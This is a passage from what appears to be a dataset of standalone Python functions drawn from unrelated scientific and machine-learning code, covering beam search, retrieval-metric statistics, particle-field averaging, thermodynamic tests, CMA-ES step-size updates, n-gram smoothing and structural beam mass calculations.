elif nspike==0:\n # BMA dominated by discontinuous model\n d_bma = y\n else:\n # BMA is a mixture\n kde_fit = stats.gaussian_kde(samples, \n bw_method='silverman')\n d_bma = kde_fit(xrange)\n \n return {'es_BMA': d_bma,\n 'es_Disc': y,\n 'es_disc_stats': (d_mean_D, d_std_D),\n 'pval': pval,\n 'es_range': xrange,\n 'f(b)': (m0b, m1b),\n 'es_transform': lambda z: z*d_std_D + d_mean_D}", "def calc_std_nDCG_AP_corpus_smoothing(p):\n \n# nDCG_MAP_res = base_path +\"\\\\nDCG_MAP_res\\\\\"\n measures_res = linux_base_path+ \"/measures_res\"+setup+\"/\"\n k_val = 50\n NDCG_AP_all_claims_all_param_values = read_pickle(measures_res+\"NDCG_AP_prec_at_k_all_claims_all_param_values_top_k_docs_\"+str(k_val)+\"_at_\"+str(p)) #key:clm,alpha_f,beta_f,k_val,lambda_f val nDCG_score,AP_score\n each_params_AVGnDCG_MAP_dict = read_pickle(measures_res+\"each_params_AVGnDCG_MAP_prec_at_k_dict_top_k_docs_\"+str(k_val)+\"_at_\"+str(p)) #key:alpha_f,beta_f,k_val,lambda_f\n nDCG_MAP_std = {} #key is a configuration quadruplet, value is the std of the measures\n \n \n \n# for k_val in top_k_docs_values:\n for alpha in range(0,11,1): #change just for test!\n for beta in range(0,10,1):\n for lambda_int in range(0,11,1):\n lambda_f = turn_to_float([lambda_int])\n (alpha_f,beta_f) = turn_to_float([alpha,beta])\n curr_AP_var = 0\n curr_nDCG_var = 0\n curr_prec_at_5_var = 0\n curr_prec_at_10_var = 0\n for clm in claim_list:\n curr_nDCG_var += (NDCG_AP_all_claims_all_param_values[str(clm),alpha_f,beta_f,k_val,lambda_f][0] - each_params_AVGnDCG_MAP_dict[alpha_f,beta_f,k_val,lambda_f][0])**2\n curr_AP_var += (NDCG_AP_all_claims_all_param_values[str(clm),alpha_f,beta_f,k_val,lambda_f][1] - each_params_AVGnDCG_MAP_dict[alpha_f,beta_f,k_val,lambda_f][1])**2\n curr_prec_at_5_var += (NDCG_AP_all_claims_all_param_values[str(clm),alpha_f,beta_f,k_val,lambda_f][2] - each_params_AVGnDCG_MAP_dict[alpha_f,beta_f,k_val,lambda_f][2])**2\n curr_prec_at_10_var +=(NDCG_AP_all_claims_all_param_values[str(clm),alpha_f,beta_f,k_val,lambda_f][3] - each_params_AVGnDCG_MAP_dict[alpha_f,beta_f,k_val,lambda_f][3])**2\n curr_nDCG_std = float(float(math.sqrt(curr_nDCG_var))/float(len(claim_list)))\n curr_AP_std = float(float(math.sqrt(curr_AP_var))/float(len(claim_list)))\n curr_prec_at_5_std = float(float(math.sqrt(curr_prec_at_5_var))/float(len(claim_list)))\n curr_prec_at_10_std =float(float(math.sqrt(curr_prec_at_10_var))/float(len(claim_list)))\n nDCG_MAP_std[alpha_f,beta_f,k_val,lambda_f] = (curr_nDCG_std,curr_AP_std,curr_prec_at_5_std,curr_prec_at_10_std)\n save_pickle(measures_res+\"nDCG_MAP_prec_at_k_std_for_each_configuration_k_top_docs_\"+str(k_val)+\"_at_\"+str(p), nDCG_MAP_std)", "def sample_beam_search(self, features, states=None):\n sampled_ids = []\n inputs = features.unsqueeze(0)\n beam_size = 5\n candidates = []\n all_candidates = []\n for i in range(30): # maximum sampling length\n if i==0:\n hiddens, states = self.lstm(inputs, states) # (batch_size, 1, hidden_size), \n outputs = self.linear(hiddens.squeeze(1)) # (batch_size, vocab_size) \n predictions = torch.topk(outputs,beam_size)\n for k in range(beam_size):\n candidates.append([predictions[1][0][k], predictions[0][0][k].cpu().data.numpy()[0] , hiddens , states]) \n else: \n all_candidates = []\n for k in range(beam_size):\n candidate = candidates[k]\n inputs = self.embed(candidate[0][len(candidate[0])-1])\n inputs = inputs.unsqueeze(0)\n # print(inputs)\n hiddens, states = self.lstm(inputs, candidate[3]) # (batch_size, 1, hidden_size), \n outputs = self.linear(hiddens.squeeze(1)) # (batch_size, vocab_size) \n predictions = torch.topk(outputs,beam_size)\n for k in range(beam_size):\n new_candidate = [torch.cat((candidate[0],predictions[1][0][k]),0),candidate[1] + predictions[0][0][k].cpu().data.numpy()[0], hiddens, states]\n all_candidates.append(new_candidate)\n ordered = sorted(all_candidates, key=lambda tup:tup[1], reverse = True)\n candidates = ordered[:beam_size]\n sampled_ids = candidates[0][0]\n return sampled_ids.squeeze()", "def calculate_averaged_properties(poly_data, bucket):\n\n locator = vtk.vtkPointLocator()\n locator.SetDataSet(poly_data)\n locator.BuildLocator()\n\n LENGTH = 0.03\n MODIFIER = 3e3\n\n volume = numpy.zeros(poly_data.GetNumberOfPoints())\n temperature = numpy.zeros(poly_data.GetNumberOfPoints())\n solid_pressure = numpy.zeros(poly_data.GetNumberOfPoints())\n velocity = numpy.zeros((poly_data.GetNumberOfPoints(), 3))\n solid_pressure_gradient = numpy.zeros((poly_data.GetNumberOfPoints(), 3))\n\n for particle in bucket:\n point_list = vtk.vtkIdList()\n locator.FindPointsWithinRadius(LENGTH, particle.pos, point_list)\n\n beta = 1.0/6.0*numpy.pi*particle.parameters.diameter**3\n\n for _ in range(point_list.GetNumberOfIds()):\n point_index = point_list.GetId(_)\n\n particle2 = bucket.particles[point_index]\n\n rad2 = distance2(particle2.pos, particle.pos)\n rad2 /= LENGTH**2\n\n gamma = beta*numpy.exp(-rad2)*MODIFIER\n\n volume[point_index] += gamma\n\n velocity[point_index, :] += particle.vel*gamma\n\n volume /= 0.5*LENGTH**2*(1.0-numpy.exp(-1.0**2))\n velocity /= 0.5*LENGTH**2*(1.0-numpy.exp(-1.0**2))\n\n for i in range(3):\n velocity[:, i] /= volume\n\n for k, particle in enumerate(bucket):\n point_list = vtk.vtkIdList()\n locator.FindPointsWithinRadius(LENGTH, particle.pos, point_list)\n\n beta = 1.0/6.0*numpy.pi*particle.parameters.diameter**3\n\n for _ in range(point_list.GetNumberOfIds()):\n point_index = point_list.GetId(_)\n\n rad2 = distance2(poly_data.GetPoints().GetPoint(point_index), particle.pos)\n rad2 /= LENGTH**2\n\n gamma = beta*numpy.exp(-rad2)*MODIFIER\n\n c = distance2(particle.vel, velocity[k, :])\n\n temperature[point_index] += c*gamma\n\n\n for particle in bucket:\n point_list = vtk.vtkIdList()\n locator.FindPointsWithinRadius(LENGTH, particle.pos, point_list)\n\n beta = 1.0/6.0*numpy.pi*particle.parameters.diameter**3\n\n for _ in range(point_list.GetNumberOfIds()):\n point_index = point_list.GetId(_)\n\n rad2 = distance2(poly_data.GetPoints().GetPoint(point_index), particle.pos)\n rad2 /= LENGTH **2\n\n gamma = beta*numpy.exp(-rad2)*MODIFIER\n\n c = distance2(particle.vel, velocity[point_index, :])\n\n val = (bucket.particles[point_index].pos-particle.pos)/LENGTH**2\n\n spg = ((radial_distribution_function(volume[point_index])\n +volume[point_index]*rdf_deriv(volume[point_index]))*temperature[point_index]\n +c*volume[point_index]*radial_distribution_function(volume[point_index]))\n\n solid_pressure_gradient[point_index, :] += (val*spg*gamma)\n\n for _ in range(poly_data.GetNumberOfPoints()):\n\n solid_pressure[_] = (bucket.particles[0].parameters.rho*volume[_]\n *radial_distribution_function(volume[_])*temperature[_])\n\n data = [vtk.vtkDoubleArray()]\n data[0].SetName('SolidVolumeFraction')\n data.append(vtk.vtkDoubleArray())\n data[1].SetName('SolidVolumeVelocity')\n data[1].SetNumberOfComponents(3)\n data.append(vtk.vtkDoubleArray())\n data[2].SetName('GranularTemperature')\n data.append(vtk.vtkDoubleArray())\n data[3].SetName('SolidPressure')\n data.append(vtk.vtkDoubleArray())\n data[4].SetName('SolidPressureGradient')\n data[4].SetNumberOfComponents(3)\n\n for _ in range(poly_data.GetNumberOfPoints()):\n data[0].InsertNextValue(volume[_])\n data[1].InsertNextTuple3(*velocity[_])\n data[2].InsertNextValue(temperature[_])\n data[3].InsertNextValue(solid_pressure[_])\n data[4].InsertNextTuple3(*solid_pressure_gradient[_])\n\n for _ in data:\n poly_data.GetPointData().AddArray(_)\n\n return data[4]", "def analyse ( self ) :\n \n ## get all B0 particles\n bs1 = self.gselect ( 'bs1' , \"[ Beauty => ( D_s+ ==> K- K+ pi+ ) K-]CC \")\n bs2 = self.gselect ( 'bs2' , \"[ Beauty -> ( D_s+ --> K- K+ pi+ ) K-]CC \")\n \n cnt = self.counter(\"#1 + photos \")\n cnt += bs1.size()\n \n cnt = self.counter(\"#2 - photos \")\n cnt += bs2.size()\n\n if len(bs1) != len(bs2) :\n self.Warning(\" FOUND!!!!\" , SUCCESS )\n for b in bs1:\n print ' With PHOTOS: ', b.decay() , b.barcode()\n for b in bs2:\n print ' Without PHOTOS: ', b.decay() , b.barcode()\n \n \n return SUCCESS # RETURN ", "def analyse(self):\n pass", "def __calc_s(self, df):\n df.loc[:, \"avg_num_drivers\"] = df.idle + df.incoming\n s = df.total / df.avg_num_drivers # df.total := amount of demand\n s[s > 1] = 1\n s[np.isnan(s)] = 0.0001\n s[np.isinf(s)] = 1\n\n df.loc[:, \"prob_of_s\"] = s\n df = df[[\"zone_id\", \"prob_of_s\"]]\n return df", "def setUp(self):\n \n n_f = 6\n self.n_f = n_f\n self.freq = 10. + np.arange(n_f)\n Beam = pol_beam.SimpleBeam(self.freq)\n self.width = 0.9 + (np.arange(n_f) / 5. / n_f)\n self.sigma = self.width / (2 * np.sqrt(2 * np.log(2)))\n Beam.set_width(self.width)\n self.Beam = Beam", "def _secondary_beam(self, hdr):\n # Called ApSecondaryNano in OpenMIMS\n d = {}\n tmp = unpack(self._bo + 'd 42i 2d', hdr.read(192))\n d['E0W'], d['ES'] = tmp[:2]\n d['ES widths'] = tmp[2:12]\n d['ES heights'] = tuple(tmp[12:22])\n d['AS'] = tmp[22]\n d['AS widths'] = tuple(tmp[23:33])\n d['AS heights'] = tuple(tmp[33:43])\n d['EnS'], d['EnS width'] = tmp[43:]\n return d", "def computePValues(options,whole_mapped_data,mapped_data_per_size_per_register,phase,cycle):\n min_reads_mapped_to_a_phased_register=3\n min_reads_in_a_window=10\n chromosome_hits=[]\n for chromosome in sorted(mapped_data_per_size_per_register):\n chromosome_hits.append(chromosome)\n fhr=open(options.output_directory_per_run+\"/\"+options.input_filename+\"_\"+str(phase)+\"_\"+str(cycle)+\"_\"+chromosome+\".regionsOfInterest\",\"r\")\n fhw=open(options.output_directory_per_run+\"/\"+options.input_filename+\"_\"+str(phase)+\"_\"+str(cycle)+\"_\"+chromosome+\".regionsOfInterest.concentrated\",\"w\")\n for line in fhr:\n register,start,end=line.strip().split()\n register=int(register)\n start=int(start)\n end=int(end)\n \n begin=start\n #print(chromosome,register,start,end)\n sys.stdout.flush()\n while begin+(phase*min_reads_mapped_to_a_phased_register) <= end+1:\n finish=begin+(phase*cycle)-1\n \n k=0\n for i in range(begin,finish+1):\n #print(chromosome,register,i,phase,start,end)\n try:\n k+=mapped_data_per_size_per_register[chromosome][register][i]\n except KeyError:\n pass\n #print(\"Next\")\n if k<min_reads_mapped_to_a_phased_register: \n begin+=phase\n continue\n \n num_all_reads=0\n for i in range(begin,finish+1):\n try:\n num_all_reads+=whole_mapped_data[chromosome][i]\n except KeyError:\n pass\n if num_all_reads<min_reads_in_a_window:\n begin+=phase\n continue\n \n n=0\n \"\"\"print(\"reached here\")\n sys.stdout.flush()\"\"\"\n # register_i is an iterator different from register\n for register_i in sorted(mapped_data_per_size_per_register[chromosome]):\n for i in range(begin,finish+1):\n try:\n n+=mapped_data_per_size_per_register[chromosome][register_i][i]\n except KeyError:\n pass\n \"\"\"if chromosome==\"Chr1\":\n print(str(n)+\" \"+str(num_all_reads)+\"\\n\")\"\"\"\n if n/num_all_reads<0.3:\n begin+=phase\n continue\n m=cycle*2\n pvalue=0\n for x in range(k,m+1):\n numerator=nCr((phase-1)*m,n-x)*nCr(m,x)\n pvalue+=numerator\n denominator=nCr(phase*m,n)\n pvalue=pvalue/denominator\n #print(chromosome,begin,finish,k,n,m,num_all_reads,pvalue,n/num_all_reads)\n if pvalue>=options.pvalue_cutoff:\n begin+=phase\n continue\n stuffs_to_be_printed_to_file=[register,begin,finish,k,n,m,num_all_reads,n/num_all_reads,pvalue]\n fhw.write(\"\\t\".join(map(str,stuffs_to_be_printed_to_file))+\"\\n\")\n sys.stdout.flush()\n begin+=phase", "def process_traces(self, s, h):\n # filter data\n if PAR.FREQLO and PAR.FREQHI:\n s = sbandpass(s, h, PAR.FREQLO, PAR.FREQHI)\n\n return s", "def getMeasures():", "def _steadystate2initial(self):\n self.ss_result = []\n ss = self.steady_state\n sizeclasses = numpy.unique(ss[:,0])\n for sc in sizeclasses:\n criterium = (ss[:,0]==sc)\n target = numpy.where(criterium)[0]\n div = len(target)\n masses = [ss[t, 1:].sum() for t in target]\n mass_sum = sum(masses)\n m = mass_sum / div\n m_std = self._std(masses)\n acids = ss[target, 1] / masses\n a = acids.sum() / div\n a_std = self._std(acids)\n waters = ss[target, 2] / masses\n w = waters.sum() / div\n w_std = self._std(waters)\n ethanols = ss[target, 3] / masses\n e = ethanols.sum() / div\n e_std = self._std(ethanols)\n nonsolubles = ss[target, 4] / masses\n n = nonsolubles.sum() / div\n n_std = self._std(nonsolubles)\n humuses = ss[target, 5] / masses\n h = humuses.sum() / div\n h_std = self._std(humuses)\n self.ss_result.append([m, m_std, a, a_std, w, w_std,\n e, e_std, n, n_std, h, h_std, sc])", "def score_grasps(self, grasp_vertices, grasp_normals, object_mass):\n raise NotImplementedError", "def compute_ps_mass(ps):\n\treturn sum(AA_mass_table[it] for it in ps)", "def __init__(sp, line) :\n ## frameNumber, eventName, photonEnergyEv, wavelengthA, GMD, peak_index, peak_x_raw, peak_y_raw, peak_r_assembled, peak_q, peak_resA, nPixels, totalIntensity, maxIntensity, sigmaBG, SNR\n #5, LCLS_2015_Feb22_r0169_022047_197ee, 6004.910515, 2.064714, 4.262349, 29997, 508.884796, 19.449471, 441.314606, 1.741234, 5.743053, 5, 361.105774, 112.819145, 19.236982, 18.771435\n\n sp.line = line[:-1] #.rstrip('\\n') # .replace(',',' ')\n sp.fields = sp.line.split()\n\n s_frameNumber, s_eventName, s_photonEnergyEv, s_wavelengthA, s_GMD, s_peak_index, s_peak_x_raw, s_peak_y_raw,\\\n s_peak_r_assembled, s_peak_q, s_peak_resA, s_nPixels, s_totalIntensity, s_maxIntensity, s_sigmaBG, s_SNR =\\\n sp.fields[0:16]\n\n sp.frameNumber, sp.photonEnergyEv, sp.wavelengthA = int(s_frameNumber), float(s_photonEnergyEv), float(s_wavelengthA)\n sp.GMD, sp.peak_index, sp.peak_x_raw, sp.peak_y_raw = float(s_GMD), int(s_peak_index), float(s_peak_x_raw), float(s_peak_y_raw)\n sp.peak_r_assembled, sp.peak_q, sp.peak_resA, sp.nPixels = float(s_peak_r_assembled), float(s_peak_q), float(s_peak_resA), int(s_nPixels)\n sp.totalIntensity, sp.maxIntensity, sp.sigmaBG, sp.SNR = float(s_totalIntensity), float(s_maxIntensity), float(s_sigmaBG), float(s_SNR)\n\n sp.runnum, sp.tstamp, sp.tsec, sp.s_fid = convertCheetahEventName(s_eventName)\n sp.fid = int(sp.s_fid, 16)\n\n #sp.seg, sp.row, sp.col = src_from_rc8x8(sp.peak_y_raw, sp.peak_x_raw)\n\n sp.line = line\n sp.empty = sp.empty_line()", "def test_set_sh(self):\n s = State(substance=\"water\")\n s.sh = Q_(3028.9867985920914, \"J/(kg*K)\"), Q_(1061602.391543017, \"J/kg\")\n # Pylance does not support NumPy ufuncs\n assert np.isclose(s.T, Q_(373.1242958476843, \"K\")) # type: ignore\n assert np.isclose(s.p, Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.sh[0], Q_(3028.9867985920914, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.sh[1], Q_(1061602.391543017, \"J/kg\")) # type: ignore\n assert np.isclose(s.u, Q_(1013250.0, \"J/kg\")) # type: ignore\n assert np.isclose(s.s, Q_(3028.9867985920914, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.v, Q_(0.4772010021515822, \"m**3/kg\")) # type: ignore\n assert np.isclose(s.h, Q_(1061602.391543017, \"J/kg\")) # type: ignore\n assert np.isclose(s.x, Q_(0.28475636946248034, \"dimensionless\")) # type: ignore", "def powerflow_rule(_m, l, y, s, t):\r\n\r\n return (- m.sigma_27[l, y, s, t] + m.sigma_28[l, y, s, t]\r\n + (m.INCIDENCE_MATRIX[l, self.g(l)] * m.lamb[self.g(l), y, s, t])\r\n + (m.INCIDENCE_MATRIX[l, self.h(l)] * m.lamb[self.h(l), y, s, t])\r\n == 0)", "def test_set_vs(self):\n s = State(substance=\"water\")\n s.vs = Q_(0.4772010021515822, \"m**3/kg\"), Q_(3028.9867985920914, \"J/(kg*K)\")\n # Pylance does not support NumPy ufuncs\n assert np.isclose(s.T, Q_(373.1242958476843, \"K\")) # type: ignore\n assert np.isclose(s.p, Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.vs[0], Q_(0.4772010021515822, \"m**3/kg\")) # type: ignore\n assert np.isclose(s.vs[1], Q_(3028.9867985920914, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.u, Q_(1013250, \"J/kg\")) # type: ignore\n assert np.isclose(s.s, Q_(3028.9867985920914, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.v, Q_(0.4772010021515822, \"m**3/kg\")) # type: ignore\n assert np.isclose(s.h, Q_(1061602.391543017, \"J/kg\")) # type: ignore\n assert np.isclose(s.x, Q_(0.28475636946248034, \"dimensionless\")) # type: ignore", "def detect_phasedbeam(self):\n raise NotImplementedError('For now, you could instead used dispersion code with dmarr=[0.]...')", "def welded_beam(self, u):\n assert len(u) == 4, 'Welded Beam design needs to specify 4 parameters.'\n assert u[0] != 0 and u[1] != 0 and u[2] != 0 and u[3] != 0, ('Designvalues {} cannot be zero').format(u)\n em = 6000.0 * (14 + u[1] / 2.0)\n r = sqrt(u[1] ** 2 / 4.0 + ((u[0] + u[2]) / 2.0) ** 2)\n j = 2.0 * (u[0] * u[1] * sqrt(2) * (u[1] ** 2 / 12.0 + ((u[0] + u[2]) / 2.0) ** 2))\n tau_p = 6000.0 / (sqrt(2) * u[0] * u[1])\n tau_dp = em * r / j\n tau = sqrt(tau_p ** 2 + 2.0 * tau_p * tau_dp * u[1] / (2.0 * r) + tau_dp ** 2)\n sigma = 504000.0 / (u[3] * u[2] ** 2)\n delta = 65856000.0 / (30 * 1000000 * u[3] * u[2] ** 2)\n pc = 4.013 * (30.0 * 1000000) * sqrt(u[2] ** 2 * u[3] ** 6 / 36.0) / 196.0 * (1.0 - u[2] * sqrt(30.0 * 1000000 / (4.0 * (12.0 * 1000000))) / 28.0)\n fitness = 1.10471 * u[0] ** 2 * u[1] + 0.04811 * u[2] * u[3] * (14.0 + u[1])\n return fitness", "def compute_statistics(self):", "def spectate(self):\n pass", "def process_state_info(self, state):\n K3Supervisor.process_state_info(self,state)\n\n # The pose for controllers\n self.parameters.pose = self.pose_est\n \n # Distance to the goal\n self.distance_from_goal = sqrt((self.pose_est.x - self.parameters.goal.x)**2 + (self.pose_est.y - self.parameters.goal.y)**2)\n \n # Sensor readings in real units\n self.parameters.sensor_distances = self.get_ir_distances()", "def update2(self, es, **kwargs):\n self._update_ps(es) # caveat: if es.B or es.D are already updated and ps is not, this goes wrong!\n p = self.ps\n try: pc_for_ps = 'pc for ps' in es.opts['vv'] # just in case\n except: pc_for_ps = False # 'vv' has an incompatible format or does't exist\n if pc_for_ps:\n # was: es.D**-1 * np.dot(es.B.T, es.pc)\n if es.opts['verbose'] > 5 and es.countiter == 1:\n utils.print_message('pc for ps is active')\n p = es.sm.transform_inverse(es.pc)\n try: # to filter coordinates or a\n p = es.path_for_sigma_update(p) # subspace depending on the state\n except AttributeError:\n if 11 < 3 and len(es.opts['integer_variables']):\n m = (\"Missing ``path_for_sigma_update`` attribute in {}.\"\n \"\\n This is usually not a problem unless integer mutations are used.\"\n \"\".format(type(es)))\n _warnings.warn(m)\n N = len(p)\n if N == 0: # all variables are masked, do nothing\n return 1\n if es.opts['CSA_squared']:\n s = (sum(_square(p)) / N - 1) / 2\n # sum(self.ps**2) / es.N has mean 1 and std sqrt(2/N) and is skewed\n # divided by 2 to have the derivative d/dx (x**2 / N - 1) for x**2=N equal to 1\n else:\n s = _norm(p) / Mh.chiN(N) - 1\n s *= self.cs / self.damps\n s_clipped = Mh.minmax(s, -self.max_delta_log_sigma, self.max_delta_log_sigma)\n # \"error\" handling\n if s_clipped != s:\n utils.print_warning('sigma change np.exp(' + str(s) + ') = ' + str(np.exp(s)) +\n ' clipped to np.exp(+-' + str(self.max_delta_log_sigma) + ')',\n 'update',\n 'CMAAdaptSigmaCSA',\n es.countiter, es.opts['verbose'])\n self.delta *= np.exp(s_clipped)\n return np.exp(s_clipped)", "def convertToSpectroGram(self):", "def __init__(self, n, sents, corpus='', gamma=None, addone=True):\n self.n = n\n self.smoothingtechnique = 'Interpolated (Jelinek Mercer) Smoothing'\n self.gamma = gamma\n self.addone = addone\n self.counts = counts = defaultdict(int)\n self.gamma_flag = True\n self.corpus = corpus\n # way more efficient than use set unions\n voc = ['</s>']\n for s in sents:\n voc += s\n self.voc = list(set(voc))\n\n if gamma is None:\n self.gamma_flag = False\n\n # if not gamma given\n if not self.gamma_flag:\n total_sents = len(sents)\n aux = int(total_sents * 90 / 100)\n # 90 per cent for training\n train_sents = sents[:aux]\n # 10 per cent for perplexity (held out data)\n held_out_sents = sents[-total_sents+aux:]\n\n train_sents = list(map((lambda x: ['<s>']*(n-1) + x), train_sents))\n train_sents = list(map((lambda x: x + ['</s>']), train_sents))\n\n for sent in train_sents:\n for j in range(n+1):\n # move along the sent saving all its j-grams\n for i in range(n-j, len(sent) - j + 1):\n ngram = tuple(sent[i: i + j])\n counts[ngram] += 1\n # added by hand\n counts[('</s>',)] = len(train_sents)\n # variable only for tests\n self.tocounts = counts\n # search the gamma that gives lower perplexity\n gamma_candidates = [i*50 for i in range(1, 15)]\n # xs is a list with (gamma, perplexity)\n xs = []\n sents = train_sents\n for aux_gamma in gamma_candidates:\n self.gamma = aux_gamma\n aux_perx = self.perplexity(held_out_sents)\n xs.append((aux_gamma, aux_perx))\n xs.sort(key=lambda x: x[1])\n self.gamma = xs[0][0]\n with open('old-stuff/interpolated_' + str(n) + '_parameters_'+corpus, 'a') as f:\n f.write('Order: {}\\n'.format(self.n))\n f.write('Gamma: {}\\n'.format(self.gamma))\n f.write('AddOne: {}\\n'.format(self.addone))\n f.write('Perplexity observed: {}\\n'.format(xs[0][1]))\n f.write('-------------------------------\\n')\n f.close()\n\n else:\n sents = list(map((lambda x: ['<s>']*(n-1) + x), sents))\n sents = list(map((lambda x: x + ['</s>']), sents))\n\n for sent in sents:\n # counts now holds all k-grams for 0 < k < n + 1\n for j in range(n+1):\n # move along the sent saving all its j-grams\n for i in range(n-j, len(sent) - j + 1):\n ngram = tuple(sent[i: i + j])\n counts[ngram] += 1\n # added by hand\n counts[('</s>',)] = len(sents)", "def gather_pk_ss(self):\n # only works if peak is bigger than ss (otherwise will go to 1)\n \n _t_step = numpy.arange (1, 9, .2)\n _log_t_step = 1e-7 * 10 ** (_t_step) \n \n # take max 10mM relax mech 1\n r1 = Relaxation(self.m1.Qhi, self.m1.P_init_lo)\n r1.assemble(_log_t_step, self.m1.open_states)\n \n #take max of hi-conc jump\n self.peak1 = numpy.max(r1.relax_sum)\n # calc Iss mech 1\n self.eqbm1 = r1.relax_sum[-1] #steady state at 100 sec.\n \n # take max 10mM relax mech 2\n r2 = Relaxation(self.m2.Qhi, self.m2.P_init_lo)\n r2.assemble(_log_t_step, self.m2.open_states)\n \n #take max of hi-conc jump\n self.peak2 = numpy.max(r2.relax_sum)\n # calc Iss mech 2\n self.eqbm2 = r2.relax_sum[-1]\n \n self.fold_change = (self.eqbm1 * self.peak2) / (self.eqbm2 * self.peak1)", "def __init__(self, **kwargs):\n GaussBeam.__init__(self, **kwargs)\n self.scale = kwargs.get('scale',10.)\n self.mass = kwargs.get('mass', 6.0)\n self.s0 = kwargs.get('s0', 7.0)\n self.retro = kwargs.get('retro', 1.0)\n self.alpha = kwargs.get('alpha', 1.0)\n self.Er0 = Erecoil( self.l , self.mass) \n self.mW = 1000 * (self.s0 * self.Er0 ) \\\n * np.abs( np.pi / 8. / uL(self.l) )\\\n * self.w[0]*self.w[1] / self.retro", "def vanilaScore(self,attended,state,W):", "def get_logSs(self):\n\n self.min_logS = 1E10\n self.max_logS = -1E10\n max_NHA = 0\n for m in self.components:\n prop_dict = m.read_prop_file()\n\n # Only get properties of the largest component.\n # Number of heavy atoms.\n NHA = prop_dict['NHA']\n if NHA >= max_NHA:\n self.min_logS = min([self.min_logS, prop_dict['logS']])\n self.max_logS = max([self.max_logS, prop_dict['logS']])\n max_NHA = NHA", "def apply_beam_settings(self):\n raise NotImplementedError", "def beam_search_step(state, logits, eos_id, beam_width, is_first_step,\n length_penalty):\n _, vocab_size = logits.shape\n\n bsz, beam_width = state.log_probs.shape\n onehot_eos = P.cast(\n F.one_hot(P.ones([1], 'int64') * eos_id, vocab_size), 'int64') #[1, V]\n\n probs = P.log(F.softmax(logits)) #[B*W, V]\n probs = mask_prob(probs, onehot_eos, state.finished) #[B*W, V]\n allprobs = P.reshape(state.log_probs, [-1, 1]) + probs #[B*W, V]\n\n not_finished = 1 - P.reshape(state.finished, [-1, 1]) #[B*W,1]\n not_eos = 1 - onehot_eos\n length_to_add = not_finished * not_eos #[B*W,V]\n alllen = P.reshape(state.lengths, [-1, 1]) + length_to_add\n\n allprobs = P.reshape(allprobs, [-1, beam_width * vocab_size])\n alllen = P.reshape(alllen, [-1, beam_width * vocab_size])\n allscore = hyp_score(allprobs, alllen, length_penalty)\n if is_first_step:\n allscore = P.reshape(\n allscore,\n [bsz, beam_width, -1])[:, 0, :] # first step only consiter beam 0\n scores, idx = P.topk(allscore, k=beam_width) #[B, W]\n next_beam_id = idx // vocab_size #[B, W]\n next_word_id = idx % vocab_size\n\n gather_idx = P.concat(\n [P.nonzero(idx != -1)[:, :1], P.reshape(idx, [-1, 1])], 1)\n next_probs = P.reshape(P.gather_nd(allprobs, gather_idx), idx.shape)\n next_len = P.reshape(P.gather_nd(alllen, gather_idx), idx.shape)\n\n gather_idx = P.concat([\n P.nonzero(next_beam_id != -1)[:, :1], P.reshape(next_beam_id, [-1, 1])\n ], 1)\n next_finished = P.reshape(\n P.gather_nd(state.finished, gather_idx), state.finished.\n shape) #[gather new beam state according to new beam id]\n #log.debug(gather_idx.numpy())\n #log.debug(state.finished.numpy())\n #log.debug(next_finished.numpy())\n\n next_finished += P.cast(next_word_id == eos_id, 'int64')\n next_finished = P.cast(next_finished > 0, 'int64')\n\n #log.debug(next_word_id.numpy())\n #log.debug(next_beam_id.numpy())\n next_state = BeamSearchState(\n log_probs=next_probs, lengths=next_len, finished=next_finished)\n output = BeamSearchOutput(\n scores=scores,\n predicted_ids=next_word_id,\n beam_parent_ids=next_beam_id)\n\n return output, next_state", "def canopy(self, h=3, b1=1):\n mu = min(5, 2 * h / self.sk)\n self.mu_canopy = mu\n self.s_canopy = self.mu_canopy * self.Ce * self.Ct * self.sk\n print(f'The canopy snow shape coeffeicient = {self.mu_canopy :.2f}')\n print(f'The peak canopy snow load = {self.s_canopy :.2f}kPa')", "def compute_hit_properties(w, raw_hits, argmaxes, areas, centers):\n for hit_i in range(len(raw_hits)):\n current_max = -999.9\n current_argmax = -1\n current_area = 0.0\n current_center = 0.0\n for i, x in enumerate(w[raw_hits[hit_i, 0]:raw_hits[hit_i, 1]+1]):\n if x > current_max:\n current_max = x\n current_argmax = i\n current_area += x\n current_center += i * x\n argmaxes[hit_i] = current_argmax\n areas[hit_i] = current_area\n centers[hit_i] = current_center / current_area", "def spectrum_processing(s):\n s = default_filters(s)\n s = add_precursor_mz(s)\n s = normalize_intensities(s)\n s = reduce_to_number_of_peaks(s, n_required=5, ratio_desired=0.5, n_max=500)\n s = select_by_mz(s, mz_from=0, mz_to=1000)\n s = add_losses(s, loss_mz_from=10.0, loss_mz_to=200.0)\n s = require_minimum_number_of_peaks(s, n_required=5)\n return s", "def get_center_of_mass_allies(self,obs):", "def S(self):\n Ae = 1.0/float(len(self.K)) \n return (self.avg_Ao() - Ae)/(1.0 - Ae)", "def _get_cbeam_mass_no_nsm(model, elem, mass, cg, inertia, reference_point):\n prop = elem.pid_ref\n xyz1, xyz2 = elem.get_node_positions()\n centroid = (xyz1 + xyz2) / 2.\n length = norm(xyz2 - xyz1)\n\n is_failed, out = elem.get_axes(model)\n if is_failed:\n model.log.error(str(out))\n raise RuntimeError(out)\n\n wa, wb, _ihat, jhat, khat = out\n p1 = xyz1 + wa\n p2 = xyz2 + wb\n if prop.type == 'PBEAM':\n rho = prop.Rho()\n # we don't call the MassPerLength method so we can put the NSM centroid\n # on a different axis (the PBEAM is weird)\n mass_per_lengths = []\n nsm_per_lengths = []\n for (area, nsm) in zip(prop.A, prop.nsm):\n mass_per_lengths.append(area * rho)\n nsm_per_lengths.append(nsm)\n mass_per_length = integrate_positive_unit_line(prop.xxb, mass_per_lengths)\n nsm_per_length = integrate_positive_unit_line(prop.xxb, nsm_per_lengths)\n #print('nsm/Ls=%s nsm/L=%s' % (nsm_per_lengths, nsm_per_length))\n #print('mass/Ls=%s mass/L=%s' % (mass_per_lengths, mass_per_length))\n nsm_n1 = (p1 + jhat * prop.m1a + khat * prop.m2a)\n nsm_n2 = (p2 + jhat * prop.m1b + khat * prop.m2b)\n nsm_centroid = (nsm_n1 + nsm_n2) / 2.\n\n elif prop.type == 'PBEAML':\n mass_per_lengths = prop.get_mass_per_lengths()\n #mass_per_length = prop.MassPerLength() # includes simplified nsm\n\n # m1a, m1b, m2a, m2b=0.\n 